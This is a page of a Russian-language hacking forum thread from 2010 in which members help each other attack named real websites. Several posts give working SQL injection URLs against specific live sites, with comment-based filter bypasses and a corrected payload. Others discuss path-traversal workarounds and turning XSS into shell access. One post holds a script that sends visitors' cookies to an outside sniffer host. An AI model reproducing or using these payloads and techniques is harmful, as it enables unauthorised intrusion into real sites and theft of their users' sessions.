Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    я с подобным раньше не сталкивался:

    http://web.atto.ru/catalog_new/catalog.php?act=tovar&CODE=211259

    если подставить кавычку, то эрроры будут и от mssql и от mysql, как это ?
    и возможно ли из этого что-то извлечь полезное (имя БД, юзера, версию, а то как ни пробовал, не получается) ?
     
    2 people like this.
  2. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    а mssql и mysql одновременно, это как ? :(
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.
     
    2 people like this.
  4. aka_zver

    aka_zver Elder - Старейшина

    Joined:
    17 Sep 2009
    Messages:
    471
    Likes Received:
    330
    Reputations:
    73
    Спасибо =)
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Уважаемые форучане, нужна ваша помощь в данной иньекции..по мне так стоит фильтр на лимит и на скобки.... подсобите пожайлуста..
    http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/%23&idcat=1
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,1/**/%23&idcat=1

    не понял трабла (хотя со скобками да, заморочка какая-то)

    PS: СНГ )
     
    #10926 Pashkela, 4 Jan 2010
    Last edited: 4 Jan 2010
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Pashkela извини.. что то я тормознул...большое спасибо
     
    1 person likes this.
  8. ZavuloN

    ZavuloN New Member

    Joined:
    27 Feb 2007
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А можно ли вставить подзапрос модификации в инъекцию select?
    Привелегий на запись файлов нет, привелегий на чтение файлов нет...
    Хотелось бы выполнить insert или update..

    База MySQL, 5.0.70
     
    #10928 ZavuloN, 4 Jan 2010
    Last edited: 4 Jan 2010
  9. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    http://mgta.ru/struct/faculty/psychology/030301%27%20union%20select%201%20--%20/ и так далее.
     
  10. ZavuloN

    ZavuloN New Member

    Joined:
    27 Feb 2007
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Разделение через точку запятой это для MsSQL, mysql из php так не может, да и из остальных помоему тоже. Хотелось бы что нибудь типа on duplicate key, только для selecta. Интересно, нет никакого on error?
     
  11. ZavuloN

    ZavuloN New Member

    Joined:
    27 Feb 2007
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ну вообще есть такие запросы, но при непосредственной работе с базой.
    Насколько я знаю из php такое нельзя выполнить.
     
  12. ZavuloN

    ZavuloN New Member

    Joined:
    27 Feb 2007
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Да, действительно. Но нам это к сожалению врядли поможет :(
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Как поднятся на уровень директории выше, если скрипт обрезает ".."?
     
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    сомневаюсь в возможности
     
  15. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Обрезается только ".." или "." тоже?
     
  16. Raul Duke

    Raul Duke New Member

    Joined:
    20 Jan 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
    Немного помудрив смог выполнить на нем хтмл код
    т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
    Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
    и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд?
     
    #10936 Raul Duke, 5 Jan 2010
    Last edited: 5 Jan 2010
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Если зальешь шелл через XSS - выложи видео, лол ок.
    *не надо мне тут говорить пров аши особые условия :D
    Только куки

    *скажу сам про особые условия - если через админку льется шелл, то можно написать червячка, который от лица админа сам зальет шелл. Но это много ипоты.
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    дай ссылку плиз на это чудо
     
  19. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    <script>
    img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
    </script>
    вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз
     
  20. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\
     
Thread Status:
Not open for further replies.